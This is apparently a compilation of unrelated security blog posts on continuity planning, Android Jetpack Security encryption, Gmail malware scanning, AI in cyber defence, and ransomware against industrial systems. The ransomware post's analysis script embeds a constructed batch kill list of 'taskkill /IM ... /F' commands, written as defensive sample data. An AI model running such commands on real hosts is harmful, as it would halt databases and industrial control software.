It’s only when someone takes charge that you can determine what caused the problem and how to respond.

You don’t need to get into specifics here (that’s covered in step five), but you do need to document who will get the process started, how response teams will be mobilised and where those responsible for enacting the plan should meet.

4. Developing the BCP

This is the meat of your plan, containing the actions you will take to recover from various incidents. It is the result of two other processes, the risk assessment and the BIA (business impact analysis), in which you identify the threats you face and the way your organisation will be affected by them.

Once you’ve collected this information, take each disruption in turn and outline the steps that must be taken to protect individuals (staff, customers and third parties) while it lasts, as well as the actions needed to contain it and prevent further loss, disturbance or unavailability of prioritised activities.

You should also use this opportunity to create guidelines on record-keeping requirements during and after the incident (what needs to be recorded, and where); to document the prioritised recovery objectives and the actions and resources needed to achieve them; and to map your internal and external (inter)dependencies and how these might affect one another during a disruptive incident.

5. Communications

This stage focuses on internal and external communications. Internal communication refers to the way you will keep employees informed about the state of the business, something that’s particularly important if your usual modes of communication are disabled due to the disruption.

In the event of serious disruptions, you should also consider contacting employees’ next of kin to update them on their wellbeing. This is both thoughtful and prevents your organisation’s phone lines from being jammed by concerned family members.

External communication refers to the way you will deal with the media regarding the incident. If the disruption is severe enough, you should release a statement explaining the nature of the incident, what has been affected and how you are responding.

In extreme cases, you might also be obliged to give interviews, in which case you should decide who will represent your organisation and what your strategy will be.

6. Stakeholders

You will be required to contact stakeholders as soon as possible following a disruption, so your BCP should contain their contact details for easy reference.

7. Document owner, approver and change history

The business continuity manager is the owner of the BCP and is responsible for ensuring that the procedure is reviewed and tested regularly.

8. Change management

Once the plan is finalised, it should be published in hard copy and as a digital file, and be made accessible to all members of staff.

Every time changes are made to the BCP, you must ensure that the digital and hard-copy forms are updated.


The importance of testing your business continuity plan

The only way to be sure that your plan works is by testing (or ‘validating’) it. How often you test the plan is up to you, but we recommend doing it at least twice a year or whenever there are substantial changes to your organisation.

There are three types of test that you can conduct:

The first are table-top exercises. This is essentially a read-through of the plan. Senior employees and those with BCP responsibilities should go through the plan together, looking for gaps and ensuring that all business units are represented.

Alternatively, you might choose to conduct a structured walkthrough. This is like a rehearsal, with each team member role-playing their responsibilities according to specified disruptions.

The objective is to familiarise employees with their responsibilities and to make sure the plan works as intended.

You might choose to simulate the process across the entire organisation, but it can obviously be difficult to make everyone available at the same time, particularly given that the walkthrough will probably have to occur outside of office hours.

As such, you might choose to split the walkthrough across the week, with one or two departments playing out a disaster at a time.

Finally, you might conduct a disaster simulation test, which is essentially a dress rehearsal. You create a test environment that simulates an actual disaster across the entire organisation and then put the plan into action.

Unlike other types of test, you aren’t looking for gaps as you go. Instead, you should see the plan through to its conclusion, so you know exactly what the consequences of your actions (or lack thereof) are.

Only after you’ve seen the plan through to the end should you review your actions and look for ways to improve.


Use our free business continuity plan template

To help you with your BCP, we’ve created a free downloadable template.

This template outlines what should be included in a BCP that has been tailored to your organisation.


If you’re looking for more help creating your BCP, you might be interested in our BCMS Documentation Toolkit.

It contains templates of everything you need to implement an ISO 22301-compliant BCMS, helping you save time and money.



A version of this blog was originally published on 20 May 2019.

The post How to write a business continuity plan: the easy way appeared first on IT Governance UK Blog.

Data Encryption on Android with Jetpack Security

Posted by Jon Markoff, Staff Developer Advocate, Android Security

Illustration by Virginia Poltrack

Have you ever tried to encrypt data in your app? As a developer, you want to keep data safe and in the hands of the party intended to use it. But if you’re like most Android developers, you don’t have a dedicated security team to help encrypt your app’s data properly. If you search the web to learn how to encrypt data, you may well get answers that are several years out of date and provide incorrect examples.

The Jetpack Security (JetSec) crypto library provides abstractions for encrypting Files and SharedPreferences objects. The library promotes the use of the AndroidKeyStore while using safe and well-known cryptographic primitives. Using EncryptedFile and EncryptedSharedPreferences allows you to locally protect files that may contain sensitive data, API keys, OAuth tokens, and other types of secrets.

Why would you want to encrypt data in your app? Hasn’t Android supported encrypting the user data partition since 5.0, and required it on capable devices since 6.0? It has, but there are use cases where you want an extra layer of protection. If your app writes to shared storage, you should encrypt the data. In the app home directory, you should encrypt data if your app handles sensitive information, including but not limited to personally identifiable information (PII), health records, financial details or enterprise data. When possible, we recommend that you tie this information to biometrics for an extra level of protection.

Jetpack Security is based on Tink, an open-source, cross-platform security project from Google. Tink might be appropriate if you need general encryption, hybrid encryption, or something similar. Jetpack Security data structures are fully compatible with Tink.

Key Generation

Before we jump into encrypting your data, it’s important to understand how your encryption keys will be kept safe. Jetpack Security uses a master key, which wraps (encrypts) the subkeys used for each cryptographic operation. JetSec provides a recommended default master key in the MasterKeys class: a basic AES256-GCM key that is generated and stored in the AndroidKeyStore. The AndroidKeyStore holds cryptographic keys in the TEE or, where the hardware has one, StrongBox, making them hard to extract. The wrapped subkeys (Tink keysets) are stored in a configurable SharedPreferences file.

Jetpack Security mainly uses the AES256_GCM_SPEC specification, which is recommended for general use cases. AES256-GCM is symmetric and generally fast on modern devices.


val keyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC)

For apps that require more configuration, or handle very sensitive data, we recommend building your own KeyGenParameterSpec, choosing options that make sense for your use. Time-bound keys with BiometricPrompt can provide an extra level of protection against rooted or compromised devices.

Important options:

  • setUserAuthenticationRequired() and setUserAuthenticationValidityDurationSeconds() together create a time-bound key. Time-bound keys require authorization through BiometricPrompt before the symmetric key can be used for either encryption or decryption.
  • setUnlockedDeviceRequired() sets a flag that ensures the key cannot be used while the device is locked. This flag is available on Android Pie (API 28) and higher.
  • setIsStrongBoxBacked() runs the key’s crypto operations on a separate, hardened secure element. This has a slight performance impact but is more secure. It is available on some devices running Android Pie or higher; on devices without it, key generation fails with StrongBoxUnavailableException, so check for PackageManager.FEATURE_STRONGBOX_KEYSTORE first.

Note: If your app needs to encrypt data in the background, you should not use time-bound keys or require that the device is unlocked, as you will not be able to accomplish this without a user present.


// Custom Advanced Master Key
// Runs inside a Context (e.g. an Activity), which supplies packageManager.
import android.content.pm.PackageManager
import android.os.Build
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import androidx.security.crypto.MasterKeys

val advancedSpec = KeyGenParameterSpec.Builder(
    "master_key",
    KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
).apply {
    setBlockModes(KeyProperties.BLOCK_MODE_GCM)
    setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
    setKeySize(256)
    // Time-bound key: each use must follow a BiometricPrompt authentication
    // within the last 15 seconds (the value must be larger than 0).
    setUserAuthenticationRequired(true)
    setUserAuthenticationValidityDurationSeconds(15)
    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
        setUnlockedDeviceRequired(true)
        // Only request StrongBox where the device has one; otherwise key
        // generation fails with StrongBoxUnavailableException.
        if (packageManager.hasSystemFeature(PackageManager.FEATURE_STRONGBOX_KEYSTORE)) {
            setIsStrongBoxBacked(true)
        }
    }
}.build()

val advancedKeyAlias = MasterKeys.getOrCreate(advancedSpec)

Unlocking time-bound keys

You must use BiometricPrompt to authorize the user if your key was created with the following options:

  • setUserAuthenticationRequired(true)
  • setUserAuthenticationValidityDurationSeconds() greater than 0

After the user authenticates, the key is usable for the number of seconds set in the validity duration; once that window has passed, the platform keystore rejects the next operation with UserNotAuthenticatedException until the user authenticates again. Jetpack Security does not expose an API to query these settings, so your app must keep track of them (the platform’s KeyInfo class, obtained through SecretKeyFactory.getKeySpec(), can report them for a key you load from the AndroidKeyStore yourself). You should build your BiometricPrompt instance in the onCreate() method of the activity where you present the dialog to the user.

BiometricPrompt code to unlock time-bound keys

import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat

class UnlockActivity : AppCompatActivity() {

    // Declared before biometricPrompt so it is initialised by the time onCreate runs.
    private val authenticationCallback = object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            super.onAuthenticationSucceeded(result)
            // Unlocked -- the time-bound key is usable for its validity window. Do work here.
        }

        override fun onAuthenticationError(errorCode: Int, errString: CharSequence) {
            super.onAuthenticationError(errorCode, errString)
            // Handle error (user cancelled, lockout, no biometric hardware, ...).
        }
    }

    private lateinit var promptInfo: BiometricPrompt.PromptInfo
    private lateinit var biometricPrompt: BiometricPrompt

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)

        promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle("Unlock?")
            .setDescription("Would you like to unlock this key?")
            .setDeviceCredentialAllowed(true)
            .build()

        biometricPrompt = BiometricPrompt(
            this, // Activity
            ContextCompat.getMainExecutor(this),
            authenticationCallback
        )
    }

    // To use: call this before working with the time-bound key.
    fun unlock() = biometricPrompt.authenticate(promptInfo)
}

Encrypt Files

Jetpack Security includes an EncryptedFile class, which removes the challenges of encrypting file data. Similar to File, EncryptedFile provides a FileInputStream object for reading and a FileOutputStream object for writing. Files are encrypted using Streaming AEAD, which follows the OAE2 definition: the data is divided into chunks, each encrypted with AES256-GCM under a per-file key derived with HKDF, in such a way that chunks cannot be reordered or truncated without detection.

import androidx.security.crypto.EncryptedFile
import java.io.File

val secretFile = File(filesDir, "super_secret")
val encryptedFile = EncryptedFile.Builder(
    secretFile,
    applicationContext,
    advancedKeyAlias,
    EncryptedFile.FileEncryptionScheme.AES256_GCM_HKDF_4KB
)
    .setKeysetAlias("file_key") // optional
    .setKeysetPrefName("secret_shared_prefs") // optional
    .build()

// openFileOutput() refuses to overwrite: it throws IOException if secretFile
// already exists, so delete the old file first when replacing its contents.
encryptedFile.openFileOutput().use { outputStream ->
    // Write data to your encrypted file
}

encryptedFile.openFileInput().use { inputStream ->
    // Read data from your encrypted file
}
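Putting the file and time-bound-key pieces together, here is an added example (our own code, not part of the original post or of the Jetpack Security library) that wraps EncryptedFile in a small store which writes and reads a UTF-8 string and tells the caller when the master key must first be unlocked with BiometricPrompt. It assumes a master-key alias created as in the advancedSpec block above; SecretFileStore, SecretResult and the file name in the usage comment are our own names. Which exception surfaces for a locked key can vary between Tink/JetSec versions (an assumption, not something the post states), so the catch order keeps the generic GeneralSecurityException as the fallback.

```kotlin
// Added example, not from the Jetpack Security post: an EncryptedFile wrapper whose
// result type tells the UI whether it needs to run BiometricPrompt and retry.
import android.content.Context
import android.security.keystore.KeyPermanentlyInvalidatedException
import android.security.keystore.UserNotAuthenticatedException
import androidx.security.crypto.EncryptedFile
import java.io.File
import java.io.IOException
import java.security.GeneralSecurityException

sealed class SecretResult {                       // our own result type (assumption)
    data class Ok(val text: String) : SecretResult()
    object NeedsUnlock : SecretResult()           // time-bound window expired: prompt, then retry
    object KeyInvalidated : SecretResult()        // new biometric enrolled or lock screen removed
    data class Failed(val cause: Exception) : SecretResult()
}

class SecretFileStore(private val context: Context, private val masterKeyAlias: String) {

    private fun open(file: File): EncryptedFile =
        EncryptedFile.Builder(
            file,
            context,
            masterKeyAlias,                       // e.g. MasterKeys.getOrCreate(advancedSpec)
            EncryptedFile.FileEncryptionScheme.AES256_GCM_HKDF_4KB
        ).build()

    /** Replaces the file's contents. EncryptedFile refuses to overwrite, so delete first. */
    fun write(name: String, text: String): SecretResult = guarded {
        val file = File(context.filesDir, name)
        if (file.exists() && !file.delete()) throw IOException("could not replace $name")
        open(file).openFileOutput().use { it.write(text.toByteArray(Charsets.UTF_8)) }
        SecretResult.Ok(text)
    }

    /** Decrypts the whole file; a missing file surfaces as Failed(FileNotFoundException). */
    fun read(name: String): SecretResult = guarded {
        val file = File(context.filesDir, name)
        val bytes = open(file).openFileInput().use { it.readBytes() }
        SecretResult.Ok(String(bytes, Charsets.UTF_8))
    }

    // Maps keystore failures to something the UI can act on. Specific platform
    // exceptions are matched first; GeneralSecurityException is the safety net because
    // the exact type that reaches us may depend on the library version (assumption).
    private inline fun guarded(block: () -> SecretResult): SecretResult = try {
        block()
    } catch (e: UserNotAuthenticatedException) {
        SecretResult.NeedsUnlock
    } catch (e: KeyPermanentlyInvalidatedException) {
        SecretResult.KeyInvalidated
    } catch (e: GeneralSecurityException) {
        SecretResult.Failed(e)
    } catch (e: IOException) {
        SecretResult.Failed(e)
    }
}

// Usage, from an Activity that owns a BiometricPrompt as in the post:
// val store = SecretFileStore(applicationContext, advancedKeyAlias)
// when (val r = store.read("super_secret")) {
//     is SecretResult.Ok -> show(r.text)
//     SecretResult.NeedsUnlock -> biometricPrompt.authenticate(promptInfo) // then read() again
//     SecretResult.KeyInvalidated -> recreateKeyAndData()  // the old ciphertext is unrecoverable
//     is SecretResult.Failed -> log(r.cause)
// }
```

The NeedsUnlock branch is the one callers tend to forget: with a 15-second validity window, a read that worked a moment ago can fail on the next screen, and the right response is to re-prompt and retry, not to treat the data as lost. KeyInvalidated is the opposite case; the master key is gone for good, and anything it wrapped must be re-created once the user has set up the key again.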

Encrypt SharedPreferences

If your application needs to save key-value pairs, such as API keys, JetSec provides the EncryptedSharedPreferences class, which implements the same SharedPreferences interface that you’re used to.

Both keys and values are encrypted. Keys are encrypted using AES256-SIV-CMAC, which provides a deterministic cipher text; values are encrypted with AES256-GCM and are bound to the encrypted key. This scheme allows the key data to be encrypted safely, while still allowing lookups.

import androidx.core.content.edit // core-ktx extension wrapping edit()/apply()
import androidx.security.crypto.EncryptedSharedPreferences

EncryptedSharedPreferences.create(
    "my_secret_prefs",
    advancedKeyAlias,
    applicationContext,
    EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
    EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM
).edit {
    // Update secret values
}
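As an added example (our own code, not from the post or the library), the following stores an API token with EncryptedSharedPreferences, reads it back, and then opens the same XML file through the plain SharedPreferences API to confirm that neither the key name nor the token appears in clear on disk. It uses the library’s default master key, so it runs without a BiometricPrompt; the file name, the key "api_token" and the token value are constructed for the demonstration.

```kotlin
// Added example, not from the Jetpack Security post: round-trip a secret through
// EncryptedSharedPreferences and inspect what actually lands in the XML file.
import android.content.Context
import android.content.SharedPreferences
import androidx.security.crypto.EncryptedSharedPreferences
import androidx.security.crypto.MasterKeys

private const val PREFS_FILE = "my_secret_prefs"   // constructed name for the demo

fun encryptedPrefs(context: Context): SharedPreferences =
    EncryptedSharedPreferences.create(
        PREFS_FILE,
        MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC),  // default, non-time-bound key
        context,
        EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
        EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM
    )

fun storeToken(context: Context, token: String) {
    // commit() rather than apply() so the write has reached disk before we inspect it
    encryptedPrefs(context).edit().putString("api_token", token).commit()
}

fun loadToken(context: Context): String? =
    encryptedPrefs(context).getString("api_token", null)

/** What someone holding the XML file sees: opaque keys and values plus the wrapped keysets. */
fun rawEntries(context: Context): Map<String, *> =
    context.getSharedPreferences(PREFS_FILE, Context.MODE_PRIVATE).all

/** True when neither the plaintext key name nor the token is present in the on-disk file. */
fun plaintextIsAbsent(context: Context, token: String): Boolean {
    val raw = rawEntries(context)
    return "api_token" !in raw.keys && raw.values.none { it == token }
}

/** Self-check for an instrumented test or a debug screen; returns true when both hold. */
fun selfCheck(context: Context): Boolean {
    val token = "tok_4f9c2e-constructed-demo-value"  // constructed sample, not a real credential
    storeToken(context, token)
    return loadToken(context) == token && plaintextIsAbsent(context, token)
}
```

Because AES256-SIV is deterministic, the same key name always maps to the same encrypted key, which is what makes getString() lookups possible; the value ciphertext is randomised and bound to that encrypted key as associated data, so a value ciphertext copied under a different key in the XML file would fail to decrypt. If you dump rawEntries() you will also see the library’s two wrapped keysets stored alongside your data in the same file.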

More Resources

FileLocker is a sample app on the Android Security GitHub samples page. It’s a good example of how to use file encryption with Jetpack Security.

Happy Encrypting!

Improving Malicious Document Detection in Gmail with Deep Learning

Gmail protects your incoming mail against spam, phishing attempts, and malware. Our existing machine learning models are highly effective at doing this, and in conjunction with our other protections, they help block more than 99.9% of threats from reaching Gmail inboxes.

One of our key protections is our malware scanner, which processes more than 300 billion attachments each week to block harmful content. 63% of the malicious documents we block differ from day to day. To stay ahead of this constantly evolving threat, we recently added a new generation of document scanners that rely on deep learning to improve our detection capabilities. We’re sharing the details of this technology and its early success this week at RSA 2020.


Since the new scanner launched at the end of 2019, we have increased our daily detection coverage of Office documents that contain malicious scripts by 10%. Our technology is especially helpful at detecting adversarial, bursty attacks. In these cases, our new scanner has improved our detection rate by 150%. Under the hood, our new scanner uses a distinct TensorFlow deep-learning model trained with TFX (TensorFlow Extended) and a custom document analyzer for each file type. The document analyzers are responsible for parsing the document, identifying common attack patterns, extracting macros, deobfuscating content, and performing feature extraction.


Strengthening our document detection capabilities is one of our key focus areas, as malicious documents represent 58% of the malware targeting Gmail users. We are still actively developing this technology, and right now, we only use it to scan Office documents.

Our new scanner runs in parallel with existing detection capabilities, all of which contribute to the final verdict of our decision engine to block a malicious document. Combining different scanners is one of the cornerstones of our defense-in-depth approach to help protect users and ensure our detection system is resilient to adversarial attacks.

We will continue to actively expand the use of artificial intelligence to protect our users’ inboxes, and to stay ahead of attacks.

Cyber Defence: How Machine Learning and AI are Eliminating the Complexity

Machine learning and artificial intelligence are changing the way that businesses operate. Whether it’s on the factory floor or in back-end IT, automated services and machines are increasing speed and productivity all while freeing up workers to focus on tasks which require a totally different set of skills.

Alongside this, the role of AI in cyber security is growing, as is the number of AI-based security tools in use. The appeal is that an AI system keeps learning from the data it is given, so it is constantly changing and improving. In an environment where attackers are always probing for a way into a system, protecting company data has never been a higher priority. With this in mind, it’s important to understand what AI in cyber security is and how it is being implemented.

The Purpose of Cybersecurity

AI is proving to be one of the most influential and game-changing technology advancements in the business world. As more and more enterprises embrace the digital sphere, companies are finding new and exciting ways to implement AI-based functions into every platform and software tool at their disposal. However, one of the natural consequences of this is that cybercriminals view this increasing digitization as a definite window of opportunity.

A cyber threat is any act that intends to steal, damage or otherwise interfere with data or the systems that hold it. These are more than a nuisance: cyber attacks can cause electrical blackouts, steal valuable or sensitive data such as medical records, disrupt phone and computer networks, or paralyse entire systems so that no data is available. They can cripple a company in a heartbeat.

Some of the most common forms of cyber threats include:

  • Phishing – Email-borne attacks that trick recipients into disclosing confidential information or installing malware by clicking a link or opening an attachment.
  • Malware – Software that performs a malicious task on a targeted device or network, such as corrupting data or taking control of a system.
  • Trojans – Malware that enters a system disguised as something legitimate, such as a standard piece of software, and runs malicious code once inside.
  • DDoS – An attacker takes control of many devices at once and uses them to flood a target with traffic or requests until it can no longer serve legitimate users.
  • Data breaches – An attacker gains access to a system and steals data directly.

Cyber threats never stay the same for long. Millions of new variants appear every year, each building on the last, and that is why machine learning and artificial intelligence are so important in combating them.

How Can AI Help in Cyber Defence?

This is where AI can help massively. Machine learning-based technologies are particularly useful for detecting unknown threats to a network. The algorithms adapt as new data arrives and refine their models accordingly; the aim is a system that can predict threats and identify anomalies with greater accuracy and speed than a human analyst could manage.

Another example of AI in cyber security is the use of supervised algorithms. These uncover threats based on the labelled data they have been trained on, and then classify new data as harmful or benign. Thousands of malware samples can serve as training data for supervised algorithms, producing an efficient system for detecting incoming threats.

The Future of Cyber Defence

Because the environment changes at lightning pace, staying ahead of technological developments is crucial to business sustainability, in digital marketing as in every other sector. Here are some trends to stay aware of regarding cyber defences in 2020:

  • Predicting Threats Is Critical – More and more we’ll see companies concentrating on detecting and predicting cyber threats using AI. As technology and awareness develop in regards to using and adopting AI as a part of cyber defences, the need to predict and respond swiftly and accurately will increase in turn.
  • It Will Become Prevalent For Consumers – Consumers are starting to realize that passwords are not providing enough account protection and that their accounts are increasingly vulnerable. AI can recognize returning users and will be key in protecting the entire customer journey, from creation through to transaction. This should allow businesses to form trusting bonds with their customers as they are protected by more than just a password.
  • AI Will See A Sharp Rise In Usage – According to Capgemini, 69% of enterprises believe AI will be necessary in order to respond to cyberattacks. The majority of companies say they are counting on AI to help identify and thwart attacks that could cause increasingly expensive losses.

Final Thoughts

It can be a worrying time for businesses out there who are concerned about the growing threat of cyber-attacks. However, by combining security methods with AI and machine learning it is possible to protect yourself accordingly. By being proactive, staying up-to-date with the latest threats and working with industry professionals, you’ll be able to stay on top of even the most serious of cyber threats out there and ensure your data stays protected.

About the author

David Pittaway is a creative content writer for Aumcore, a digital marketing agency based in New York. He writes on a variety of topics ranging from SEO and machine learning to crafting the perfect creative content marketing plan.

The post Cyber Defence: How Machine Learning and AI are Eliminating the Complexity appeared first on CyberDB.

Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which expands the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.

Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

  • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
  • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
  • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.

Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.
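The comparison of kill lists across samples discussed in the two preceding sections (the shared lists, the OT-related entries, and the `proficyclient.exe4` typo) is the kind of triage an analyst repeats for every new family. The following block is an added example written for this page, not FireEye's tooling: it parses kill lists from two carriers seen in such incidents, a batch script invoking `taskkill` and a plain list extracted from a binary, normalizes them, and reports shared entries, family-specific entries, OT-related hits, and near-duplicate variants that likely stem from a copy error. The two sample lists and the OT watchlist are constructed for illustration; only `proficyclient.exe` is taken from the post.

```python
"""Added example: comparing process kill lists from two ransomware samples.

Both sample lists and the OT watchlist are constructed for this example.
Only proficyclient.exe is a process name mentioned in the post above.
"""
import difflib
import re

# Constructed sample A: batch-script carrier, with the .exe4 typo variant.
SAMPLE_A = """@echo off
taskkill /IM proficyclient.exe4 /F
taskkill /IM sqlservr.exe /F
taskkill /IM historian.exe /F
taskkill /IM outlook.exe /F
"""

# Constructed sample B: plain list as extracted from a binary's kill routine.
SAMPLE_B = """proficyclient.exe
sqlservr.exe
historian.exe
veeam.exe
"""

# Constructed watchlist of OT-related process names (hypothetical except
# proficyclient.exe); a real list would come from vendor documentation.
OT_WATCHLIST = {"proficyclient.exe", "historian.exe", "hmi.exe"}

# Matches "taskkill [/flags ...] /IM <name>" regardless of flag order.
TASKKILL_RE = re.compile(r"taskkill\s+(?:/\w+\s+)*?/IM\s+(\S+)", re.IGNORECASE)


def parse_kill_list(text):
    """Return the set of lower-cased process names named in a kill list."""
    names = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("@") or line.lower().startswith("rem "):
            continue  # skip batch boilerplate and comments
        m = TASKKILL_RE.search(line)
        name = m.group(1) if m else line.split()[0]
        names.add(name.lower())
    return names


def near_variants(only_a, only_b, cutoff=0.9):
    """Pair entries unique to each list whose strings are nearly identical,
    which usually indicates a typo or copy error rather than a new target."""
    pairs = []
    for a in sorted(only_a):
        match = difflib.get_close_matches(a, sorted(only_b), n=1, cutoff=cutoff)
        if match:
            pairs.append((a, match[0]))
    return pairs


def compare_kill_lists(text_a, text_b, watchlist=OT_WATCHLIST):
    """Summarize overlap, unique entries, typo variants and OT hits."""
    a, b = parse_kill_list(text_a), parse_kill_list(text_b)
    only_a, only_b = a - b, b - a
    variants = near_variants(only_a, only_b)
    # Count a typo variant as the process it was meant to name.
    a_canonical = a | {canonical for _, canonical in variants}
    return {
        "shared": sorted(a & b),
        "only_a": sorted(only_a),
        "only_b": sorted(only_b),
        "variants": variants,
        "ot_hits": sorted((a_canonical | b) & watchlist),
        "overlap": len(a & b) / len(a | b) if a | b else 0.0,
    }


if __name__ == "__main__":
    for key, value in compare_kill_lists(SAMPLE_A, SAMPLE_B).items():
        print(f"{key}: {value}")
```

The `overlap` ratio (Jaccard similarity of the two sets) is a cheap way to cluster samples by kill list rather than by code family, which is the point the post makes: the list travels between families, so similarity of lists is a better pivot for tracking it than any one malware name.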

Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

